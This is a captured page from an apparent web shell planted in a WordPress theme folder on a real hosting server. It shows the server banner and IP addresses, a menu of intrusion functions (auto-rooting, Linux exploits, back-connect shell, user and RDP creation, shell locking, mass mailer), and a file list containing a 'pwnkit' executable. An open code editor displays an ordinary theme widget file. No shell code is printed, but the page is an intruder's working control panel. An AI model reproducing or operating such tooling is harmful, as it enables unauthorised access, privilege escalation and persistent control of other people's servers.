Linux webm006.cluster131.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.131.20.6 | : 216.73.216.137
Cant Read [ /etc/named.conf ]
8.0.30
neuschi
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
neuschi /
www /
wp-content /
themes /
signify /
inc /
[ HOME SHELL ]
Name
Size
Permission
Action
admin
[ DIR ]
drwxr-xr-x
customizer
[ DIR ]
drwxr-xr-x
.htaccess
127
B
-r--r--r--
.mad-root
0
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
class-tgm-plugin-activation.ph...
119.89
KB
-rw-r--r--
custom-header.php
9.6
KB
-rw-r--r--
header-background-color.php
2.83
KB
-rw-r--r--
jetpack.php
1012
B
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
template-functions.php
15.88
KB
-rw-r--r--
template-tags.php
10.13
KB
-rw-r--r--
tgm.php
931
B
-rw-r--r--
widget-social-icons.php
4.18
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : widget-social-icons.php
<?php /** * Social Icons Widget * * @package Signify */ /** * Adds Social Icons widget. * * @since 1.0.0 */ class Signify_Social_Icons_Widget extends WP_Widget { /** * Holds widget settings defaults, populated in constructor. * * @var array */ protected $defaults; function __construct() { $this->defaults = array( 'title' => '', 'content' => '', 'contentformat' => 1 ); $widget_ops = array( 'classname' => 'wen-social-widget wensocialwidget social-navigation', 'description' => esc_html__( 'Use this widget to add short information and Social Menu', 'signify' ), ); $control_ops = array( 'id_base' => 'wen-social', ); parent::__construct( 'wen-social', // Base ID esc_html__( 'Social Icons', 'signify' ), // Name $widget_ops, $control_ops ); } public function widget($args, $instance) { // Get menu $nav_menu = ! empty( $instance['nav_menu'] ) ? wp_get_nav_menu_object( $instance['nav_menu'] ) : false; if ( !$nav_menu ) return; /** This filter is documented in wp-includes/default-widgets.php */ $instance['title'] = apply_filters( 'widget_title', empty( $instance['title'] ) ? '' : $instance['title'], $instance, $this->id_base ); echo $args['before_widget']; if ( !empty($instance['title']) ) echo $args['before_title'] . $instance['title'] . $args['after_title']; $nav_menu_args = array( 'fallback_cb' => '', 'menu_class' => 'social-links-menu', 'depth' => 1, 'link_before' => '<span class="screen-reader-text">', 'link_after' => '</span>', 'menu' => $nav_menu ); /** * Filter the arguments for the Custom Menu widget. * * @since 4.2.0 * * @param array $nav_menu_args { * An array of arguments passed to wp_nav_menu() to retrieve a custom menu. * * @type callback|bool $fallback_cb Callback to fire if the menu doesn't exist. Default empty. * @type mixed $menu Menu ID, slug, or name. * } * @param stdClass $nav_menu Nav menu object for the current menu. * @param array $args Display arguments for the current widget. */ wp_nav_menu( apply_filters( 'widget_nav_menu_args', $nav_menu_args, $nav_menu, $args ) ); echo $args['after_widget']; } public function update( $new_instance, $old_instance ) { $instance = array(); if ( ! empty( $new_instance['title'] ) ) { $instance['title'] = strip_tags( stripslashes($new_instance['title']) ); } if ( ! empty( $new_instance['nav_menu'] ) ) { $instance['nav_menu'] = (int) $new_instance['nav_menu']; } return $instance; } public function form( $instance ) { $title = isset( $instance['title'] ) ? $instance['title'] : ''; $nav_menu = isset( $instance['nav_menu'] ) ? $instance['nav_menu'] : ''; // Get menus $menus = wp_get_nav_menus(); // If no menus exists, direct the user to go and create some. if ( !$menus ) { echo '<p>'. sprintf( __('No menus have been created yet. <a href="%s">Create some</a>.', 'signify' ), esc_url( admin_url('nav-menus.php') ) ) . '</p>'; return; } ?> <p> <label for="<?php echo esc_attr( $this->get_field_id('title') ); ?>"><?php esc_html_e( 'Title', 'signify' ); ?></label> <input type="text" class="widefat" id="<?php echo esc_attr( $this->get_field_id('title') ); ?>" name="<?php echo esc_attr( $this->get_field_name('title') ); ?>" value="<?php echo esc_attr( $title ); ?>" /> </p> <p> <label for="<?php echo esc_attr( $this->get_field_id('nav_menu') ); ?>"><?php esc_html_e( 'Select Menu:', 'signify' ); ?></label> <select id="<?php echo esc_attr( $this->get_field_id('nav_menu') ); ?>" name="<?php echo esc_attr( $this->get_field_name('nav_menu') ); ?>"> <option value="0"><?php esc_html_e( '— Select —', 'signify' ); ?></option> <?php foreach ( $menus as $menu ) { echo '<option value="' . esc_attr( $menu->term_id ) . '"' . selected( $nav_menu, $menu->term_id, false ) . '>'. esc_html( $menu->name ) . '</option>'; } ?> </select> </p> <?php } } /** * Initialize Social Icons Widget */ function signify_social_icons_init() { register_widget( 'Signify_Social_Icons_Widget' ); } add_action( 'widgets_init', 'signify_social_icons_init' );
Close